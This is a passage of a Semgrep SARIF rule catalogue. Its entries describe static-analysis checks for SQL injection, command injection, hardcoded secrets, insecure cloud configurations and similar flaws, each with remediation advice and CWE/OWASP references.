prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli)\n - [https://github.com/MagicStack/asyncpg](https://github.com/MagicStack/asyncpg)\n - [https://magicstack.github.io/asyncpg/current/](https://magicstack.github.io/asyncpg/current/)\n","text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","id":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","name":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli","id":"kotlin.spring.hibernate-sqli.hibernate-sqli","name":"kotlin.spring.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"help":{"markdown":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"help":{"markdown":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)\n","text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"helpUri":"https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket","id":"json.aws.security.public-s3-bucket.public-s3-bucket","name":"json.aws.security.public-s3-bucket.public-s3-bucket","properties":{"precision":"very-high","tags":["CWE-264: CWE CATEGORY: Permissions, Privileges, and Access Controls","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.public-s3-bucket.public-s3-bucket"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write","id":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","name":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-command-write.dangerous-command-write"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"help":{"markdown":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality)\n - [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)\n - [https://www.whitehatsec.com/blog/magic-hashes/](https://www.whitehatsec.com/blog/magic-hashes/)\n","text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"helpUri":"https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality","id":"php.lang.security.md5-loose-equality.md5-loose-equality","name":"php.lang.security.md5-loose-equality.md5-loose-equality","properties":{"precision":"very-high","tags":["CWE-697: Incorrect Comparison","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.md5-loose-equality.md5-loose-equality"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli)\n - [https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries](https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli","id":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","name":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.sequel-sqli.sequel-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"bcrypt hash detected"},"help":{"markdown":"bcrypt hash detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"bcrypt hash detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","id":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","name":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"help":{"markdown":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs)\n - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/](https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/)\n","text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","id":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","name":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy)\n - [https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html](https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html)\n - [https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","id":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","name":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","id":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","name":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This gets data from session using user inputs. A malicious user may be able to retrieve information from your session that you didn't intend them to. Do not use user input as a session key."},"help":{"markdown":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation)\n - [https://brakemanscanner.org/docs/warning_types/session_manipulation/](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n","text":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","id":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","name":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Allowing an attacker to manipulate the session may lead to unintended behavior."}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"help":{"markdown":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n","text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file","id":"ruby.rails.security.brakeman.check-send-file.check-send-file","name":"ruby.rails.security.brakeman.check-send-file.check-send-file","properties":{"precision":"very-high","tags":["CWE-73: External Control of File Name or Path","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-send-file.check-send-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","id":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","name":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"help":{"markdown":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","id":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","name":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","id":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","name":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"transferFrom() can steal allowance of other accounts"},"help":{"markdown":"transferFrom() can steal allowance of other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug)\n - [https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5](https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5)\n - [https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C](https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C)\n","text":"transferFrom() can steal allowance of other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","id":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","name":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","id":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","name":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"help":{"markdown":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec)\n - [https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec)\n - [https://docs.python.org/3/library/shlex.html](https://docs.python.org/3/library/shlex.html)\n","text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","id":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","name":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 